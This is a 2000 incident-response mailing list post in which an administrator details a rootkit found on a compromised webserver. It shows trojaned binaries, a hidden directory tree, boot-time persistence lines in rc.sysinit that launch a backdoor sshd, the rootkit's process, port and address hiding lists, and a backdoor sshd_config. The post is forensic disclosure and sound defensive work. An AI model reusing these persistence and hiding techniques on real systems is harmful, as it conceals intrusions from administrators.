Security Incidents mailing list archives
LJK2 rootkit?
From: fs () ONE-2-ONE NET (Felix Schueren)
Date: Tue, 16 May 2000 13:55:01 -0100
A webserver's DNS service stopped working "overnight", and when I checked it out first thing in the morning, trying to run "top" dumped me to a somewhat broken (no visible chars at all) shell. Curious, I checked the procps RPM checksum from a CD vs. the installed one, and it turned out to be different. I then checked all the RPMs vs the original versions from CD: S.5..UG. /bin/ls S.5..UG. /usr/bin/locate S.5....T c /etc/rc.d/rc.sysinit S.5..UG. /sbin/syslogd S.5..UG. /bin/netstat S.5..UG. /sbin/ifconfig S.5..UG. /bin/ps SM5..UG. /usr/bin/top SM5..UG. /usr/bin/pstree SM5..UG. /bin/login .M...... /usr/bin/makemap /* failure codes: 5 - MD5 sum S - File size L - Symlink T - Mtime D - Device U - User G - Group M - Mode (includes permissions and file type) */ The user/group that all of those files had was 532/532. A search for all files owned by UID 532 revealed: ++++++++++++++++++++++++++++++++++++++ 55185 134 -rwxr-xr-x 1 532 532 136491 Aug 6 1998 /bin/ls 55186 30 -rwxr-xr-x 1 532 532 30628 Sep 3 1998 /bin/netstat 55187 37 -r-xr-xr-x 1 532 532 36959 Oct 3 1998 /bin/ps 55199 25 -r-sr-xr-x 1 532 532 24772 Oct 14 1998 /bin/login 55183 20 -rwxr-xr-x 1 532 532 19700 Sep 3 1998 /sbin/ifconfig 55201 255 -rwxr-xr-x 1 532 532 260476 Nov 16 1999 /sbin/syslogd 55182 28 -rwxr-xr-x 1 532 532 27751 Jul 29 1998 /usr/bin/locate 55203 56 -rwxr-xr-x 1 532 532 56794 Oct 3 1998 /usr/bin/top 55188 32 -rwxr-xr-x 1 532 532 32177 Sep 11 1998 /usr/bin/pstree 55178 1 -rw-r--r-- 1 532 532 131 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1addr 55180 1 -rw-r--r-- 1 532 532 77 May 14 20:47 /usr/lib/libmen.oo/.LJK2/hide/.RK1log 55179 1 -rw-r--r-- 1 532 532 76 Apr 12 13:57 /usr/lib/libmen.oo/.LJK2/hide/.RK1dir 55181 1 -rw-r--r-- 1 532 532 44 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1proc 55194 5 -rwxr-xr-x 1 532 532 4098 Sep 12 1999 /usr/lib/libmen.oo/.LJK2/hide/RK1phidemod.c 55191 4 -rwxr-xr-x 1 532 532 3407 Feb 15 20:08 /usr/lib/libmen.oo/.LJK2/modules/RK1hidem.c 55193 25 -rwxr-xr-x 1 532 532 24860 Mar 3 20:22 /usr/lib/libmen.oo/.LJK2/modules/RK1phide 55195 2 -rwxr-xr-x 1 532 532 1345 Sep 9 1999 /usr/lib/libmen.oo/.LJK2/clean/RK1sauber 55200 8 -rwxr-xr-x 1 532 532 7538 Mar 6 00:02 /usr/lib/libmen.oo/.LJK2/clean/RK1wted 55196 10 -rwxr-xr-x 1 532 532 9361 Sep 9 1999 /usr/lib/libmen.oo/.LJK2/hack/RK1sniff 55192 7 -rwxr-xr-x 1 532 532 6232 Sep 9 1999 /usr/lib/libmen.oo/.LJK2/hack/RK1parse 136797 568 -rwxr-xr-x 1 532 532 580696 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshconfig/RK1ssh 55173 1 -rw-r--r-- 1 532 532 880 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_config 55174 1 -rw-r--r-- 1 532 532 542 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_host_key 55175 1 -rw-r--r-- 1 532 532 329 Mar 6 00:34 /usr/lib/libmen.oo/.LJK2/ssh_host_key.pub 55176 1 -rwxr-xr-x 1 532 532 512 May 15 13:46 /usr/lib/libmen.oo/.LJK2/ssh_random_seed 55177 1 -rw-r--r-- 1 532 532 723 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshd_config 144926 26 -rwxr-xr-x 1 532 532 26352 Mar 3 20:06 /usr/sbin/rhxclean 55198 600 -rwxr-xr-x 1 532 532 613543 Feb 18 23:24 /usr/sbin/rpmrhup ++++++++++++++++++++++++++++++++++++++ When I checked the rc.sysinit file, the following two suspicious entries were to be found at the very end of the file: +++++++++++++++ # There is a RPM database which, # needs to be updated. if [ -x /usr/sbin/rpmrhup ]; then /usr/sbin/rpmrhup -p 60569 fi # Since there are lost procs, # we must clean them up. if [ -x /usr/sbin/rhxclean ]; then /usr/sbin/rhxclean fi +++++++++++++++ Noteworthy: The bad english. The misplaced comma is a "common" european error, would fit in nicely with the notes further down. Here's the complete listing of the .LJK2 directory structure (this is out of a backup tar, the UIDs are broken by now): +++++++++++++++++++++++ [machine]# ls -la * -rw-r--r-- 1 root root 880 Feb 18 21:24 ssh_config -rw-r--r-- 1 root root 542 Feb 18 21:24 ssh_host_key -rw-r--r-- 1 root root 329 Mar 5 22:34 ssh_host_key.pub -rwxr-xr-x 1 root root 512 May 15 10:46 ssh_random_seed* -rw-r--r-- 1 root root 723 Feb 18 21:24 sshd_config backdoor: total 29 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 26352 May 14 17:47 RK1bd* backup: total 250 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 12972 Aug 6 1998 du* -rwxr-xr-x 1 root root 25596 Sep 2 1998 ifconfig* -rw-r--r-- 1 root root 3442 May 14 17:46 inetd.conf -rwxr-xr-x 1 root root 7560 Jul 29 1998 locate* -rws--x--x 1 root root 15284 Oct 14 1998 login* -rwxr-xr-x 1 root root 29308 Aug 6 1998 ls* -rwxr-xr-x 1 root root 39168 Sep 2 1998 netstat* -r-xr-xr-x 1 root root 12708 Oct 3 1998 ps* -r-xr-xr-x 1 root root 10176 Sep 11 1998 pstree* -rwxr-xr-x 1 root root 7165 Oct 15 1998 rc.sysinit* -rwxr-xr-x 1 root root 24988 Nov 16 1999 syslogd* -rwxr-xr-x 1 root root 19640 Aug 22 1998 tcpd* -r-xr-xr-x 1 root root 30772 Oct 3 1998 top* clean: total 12 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 1345 Sep 9 1999 RK1sauber* -rwxr-xr-x 1 root root 7538 Mar 5 22:02 RK1wted* hack: total 19 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 6232 Sep 9 1999 RK1parse* -rwxr-xr-x 1 root root 9361 Sep 9 1999 RK1sniff* hide: total 11 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rw-r--r-- 1 root root 131 May 14 18:07 .RK1addr -rw-r--r-- 1 root root 76 Apr 12 10:57 .RK1dir -rw-r--r-- 1 root root 77 May 14 17:47 .RK1log -rw-r--r-- 1 root root 44 May 14 18:07 .RK1proc -rwxr-xr-x 1 root root 4098 Sep 12 1999 RK1phidemod.c* modules: total 33 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 336 Apr 12 11:02 README.modules* -rwxr-xr-x 1 root root 3407 Feb 15 18:08 RK1hidem.c* -rwxr-xr-x 1 root root 24860 Mar 3 18:22 RK1phide* sshconfig: total 574 drwxr-xr-x 2 root root 1024 May 16 07:53 ./ drwxr-xr-x 9 root root 1024 May 16 07:53 ../ -rwxr-xr-x 1 root root 580696 Feb 18 21:24 RK1ssh* +++++++++++++++++++++++ worthy to point out: ./clean/RK1sauber could very well be a hint on the nationality of the attacker, or the point of origin of the package: "sauber" is german for "clean". Also: the backup of inetd.conf is the original version w/o telnet, the /etc/inetd.conf had telnet services enabled after the package ran. A few files of interest: [root@machine]# cat .LJK2/hide/.RK1addr 1 212.204 1 62.236 2 212.204 2 62.236 3 76335 4 76335 4 6667 4 5556 4 6666 4 6664 4 6668 3 60569 4 60569 2 213.48 2 210.225 3 4103 next file: [root@machine]# cat .LJK2/hide/.RK1log RK1 .LJK2 synscan 76335 212.204 195.114 62.236 204.29 rpmrhup rhxclean 60569 next: [root@machine]# cat .LJK2/hide/.RK1dir libmen.oo .LJK2 rc.sysinit lockit25.tgz lockit25.tar lockit25.tar.gz lockit and: [root@machine]# less .LJK2/hide/.RK1proc 2 synscan 3 RK1 2 rpmrhup 2 rhxclean 3 sshd ./LJK2/ssh_host_key contains the string "root () www bigwigauctions com" ./LJK2/ssh_host_key.pub contains the string "root@LJK2" ./LJK2/sshd_config is a standard SSHd config file, contents: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # This is ssh server systemwide configuration file. Port 22 ListenAddress 0.0.0.0 HostKey /usr/lib/libmen.oo/.LJK2/ssh_host_key RandomSeed /usr/lib/libmen.oo/.LJK2/ssh_random_seed ServerKeyBits 768 LoginGraceTime 600 KeyRegenerationInterval 3600 PermitRootLogin yes IgnoreRhosts no StrictModes yes QuietMode no X11Forwarding yes X11DisplayOffset 10 FascistLogging no PrintMotd yes KeepAlive yes SyslogFacility DAEMON RhostsAuthentication no RhostsRSAAuthentication yes RSAAuthentication yes PasswordAuthentication yes PermitEmptyPasswords yes UseLogin no # CheckMail no # PidFile /u/zappa/.ssh/pid # AllowHosts *.our.com friend.other.com # DenyHosts lowsecurity.theirs.com *.evil.org evil.org # Umask 022 # SilentDeny yes +++++++++++++++++++++++++++++++++++++++++++ This looks similiar to (but not exactly like) the CERT Advisory described in the summary http://www.cert.org/summaries/CS-98.04.html The version of BIND running was bind-8.1.2-5 (yeah...I know...), and I got a couple of "lame server on..." messages and lots of named restarts around the time I place the intrusion. Any ideas on whether or not it would be possible to retrieve the Point of origin of the attack? Also, was this a known package? I haven't been able to find anything about "LJK2".. Oh, and while the machine itself has been restored, I have a full backup available, so if you have any further questions about files etc I'll be glad to dig them out. regards, felix -- ------------------------------------------------------------ Felix Schüren, fs () one-2-one net, Technik ONE-2-ONE Advertising + Telecommunications GmbH Theodor-Heuss-Str. 92-100, 51149 Koeln, Germany Telefon (01805) 6632-66 Telefax (01805) 6632-33 info () one-2-one net http://www.one-2-one.net Geschaeftsfuehrer:Mike Behrendt,HRB 28495 Koeln
Current thread:
- R: LJK2 rootkit?, (continued)
- R: LJK2 rootkit? Andrea Vettori (May 17)
- Lance Spitzner Audio interview on Forensics and Honeypots Alfred Huger (May 17)
- Re: IP Black list? -- NONONONONONONONO!!! Richard Johnson (May 16)
- IP Black list - GET REAL Roelof Temmingh (May 15)
- Re: IP Black list? Jon Lewis (May 15)
- Re: IP Black list? Ed Padin (May 15)
- Re: IP Black list? jms (May 14)
- Re: IP Black list? (Track yes, Block no) Bryan Andersen (May 16)
- You can now track Bugtraq via software (fwd) Alfred Huger (May 15)
- Re: IP Black list? jms (May 14)
- Re: IP Black list? Mike Shannon (May 15)
- LJK2 rootkit? Felix Schueren (May 16)
- Re: LJK2 rootkit? Jose Nazario (May 16)
- IP blacklists phi-incident () EXORSUS NET (May 16)
- Re: LJK2 rootkit? Omachonu Ogali (May 16)
- Re: LJK2 rootkit? Jose Nazario (May 18)
- Re: LJK2 rootkit? Omachonu Ogali (May 18)
- LJK2 rootkit? Felix Schueren (May 16)
- Re: LJK2 rootkit? Jens Hektor (May 17)
- Re: LJK2 rootkit? Egon Barfuß jun. (May 17)
- Korea Damian Gerow (May 17)
- Re: IP Black list? Ryan Russell (May 16)
- Re: IP Black list? Tabor J. Wells (May 16)